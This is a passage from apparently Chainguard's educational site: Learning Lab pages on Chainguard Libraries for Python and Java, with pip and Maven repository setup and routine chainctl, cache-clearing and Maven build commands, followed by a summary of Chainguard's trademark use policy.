Libraries 37:02 Demo: Verification with libCheck 38:22 Demo: Containerizing the demo application 40:25 Demo: Building and running containerized Flask application 41:41 Additional configuration options and documentation resources 42:19 Q&A: Repository manager setup and configuration 43:26 Q&A: Architecture support and glibc requirements 44:34 Q&A: libCheck tool open source plans and detailed output 46:05 Q&A: CVE scanning with Grype and vulnerability management Demo In the demo, we switch a Flask application to use Chainguard Libraries for Python, sourcing dependencies from a repository manager (Artifactory) set up to pull first from the Chainguard Libraries for Python index with a fallback to the Python Package Index (PyPI). Demo Flask Application We demonstrate two approaches. First, we modify the ~/.pip/pip.conf file to pull from the virtual repository set up in the repository manager: [global] index-url = <repository-url> After changing this global setting, we install and run the application from a virtual environment, then use Chainguard’s libCheck tool to test the provenance of the packages in the virtual environment. Chainguard is in the process of releasing this tool under an open source license. We also update the demo application’s requirements.txt file and build and run the application from a Chainguard Container. Resource Links Event page Slide deck Chainguard Libraries Chainguard Libraries documentation Chainguard Libraries for Python documentation Python global configuration Python build configuration Python Package Index (PyPI) pip documentation Python Packaging User Guide Cheese Must Stand: Defending the Python Library Ecosystem in 2025 at PyCon 2025 --- ### Chainguard Libraries for Java URL: https://edu.chainguard.dev/software-security/learning-labs/ll202505/ Last Modified: June 18, 2025 Tags: Learning Labs, Chainguard Libraries, Overview The May 2025 Learning Lab with Manfred Moser covers Chainguard Libraries for Java. It starts with an overview about libraries and the Java ecosystem and progresses to a demo with Apache Maven and Sonatype Nexus. Sections 0:00 Introduction and agenda 2:38 Chainguard and containers 3:47 Chainguard Factory 4:57 Concepts - from containers to libraries 9:00 Java and Java libraries 12:45 Software supply chain of libraries and attacks 19:27 Dependency supply in Java 20:30 Repository concept and Maven Central 24:32 Chainguard Libraries for Java and repository manager intro 28:17 Developer tools 29:21 Demo start and setup with chainctl 32:55 Sonatype Nexus configuration 37:30 Maven configuration 40:41 Example project setup, build, and results 44:57 Dependency list and tree 47:00 Results and verification 49:37 Summary 50:43 Up next 52:55 Questions Demo Following are some of the commands used in the demo. More information can be found in the slide deck, the linked resources, and the video. Creating a pull token: chainctl auth login chainctl libraries entitlements list chainctl auth pull-token --library-ecosystem=java --ttl=1h Cleaning up the local Maven repository cache: rm -rf ~/.m2/repository Building Trino Gateway from source and looking at dependencies: cd trino-gateway ./mvnw clean install -DskipTests=true ./mvnw dependency:list ./mvnw dependency:tree Reesource Links Chainguard Libraries Chainguard Libraries documentation Chainguard Libraries for Java documentation Slide deck Apache Maven Sonatype Nexus Repository Apache Maven dependency plugin --- ### Chainguard Trademark Use Policy URL: https://edu.chainguard.dev/software-security/trademark/ Last Modified: December 6, 2024 Tags: Reference, Product, Wolfi Chainguard has a Trademark Use Policy for Chainguard™ and Wolfi™. The Trademark Use Policy for Chainguard™ is in connection with its software tools and platforms for container image registry services and related educational services. The Trademark Use Policy for Wolfi™ is in connection with software tools and related community services. This policy helps ensure that Chainguard’s trademarks remain reliable indicators of the qualities that they are meant to preserve. The Trademark Policy details: How you may use Chainguard’s trademarks, Scenarios where trademark use is not permitted, When Chainguard’s permission may be required to use a given trademark. Under Chainguard’s Trademark Policy, when using the free-tier Chainguard Starter Containers and Wolfi components, artifacts that are created by you must clearly delineate which software is installed by you (instead of Chainguard) in such a way that is clear to vulnerability scanners and end users that you are the author of said changes to the software and not Chainguard. Further, if you attempt to rebuild Chainguard packages or Containers from source, you must remove all references to Chainguard or Wolfi in adherence to the Trademark Policy. How not to use Chainguard Trademarks Chainguard Marks must not be used in a way that is confusing, false, or misleading, or imply affiliation, endorsement, or sponsorship where it does not exist. In connection with the same, similar, or related goods or services, it is not permitted to: Misspell, hyphenate, abbreviate, or otherwise change Chainguard Marks (as in Chain guard, Chain-guard, W0lfi, etc.), Transliterate or translate Chainguard Marks, Use marks that are confusingly similar to the Chainguard Marks (such as Chainguardian, Wolfy, etc.), Combine the Chainguard Marks with other words or symbols. The above non-exhaustive examples are all considered to be confusing, false, or misleading uses of the Chainguard Marks. Below are non-exhaustive examples of how you may not use the Chainguard Marks: In the name of your business, products, service, app, publication, domain name, subdomain, or other offering, More prominently than your own company name, product, or service, On merchandise or other promotional goods for sale, In any other forms of commercial use, unless it’s for truthful descriptive reference to Chainguard products or services. Chainguard remains committed to open source licensing principles, which primarily concern copyright associated with software. The Chainguard Trademark Policy clearly defines how the organization is protecting consumers as to what products and services are coming from Chainguard and therefore meet relevant security guarantees. You can review the full Chainguard Trademark Policy or find additional information in our Open Source FAQ. ---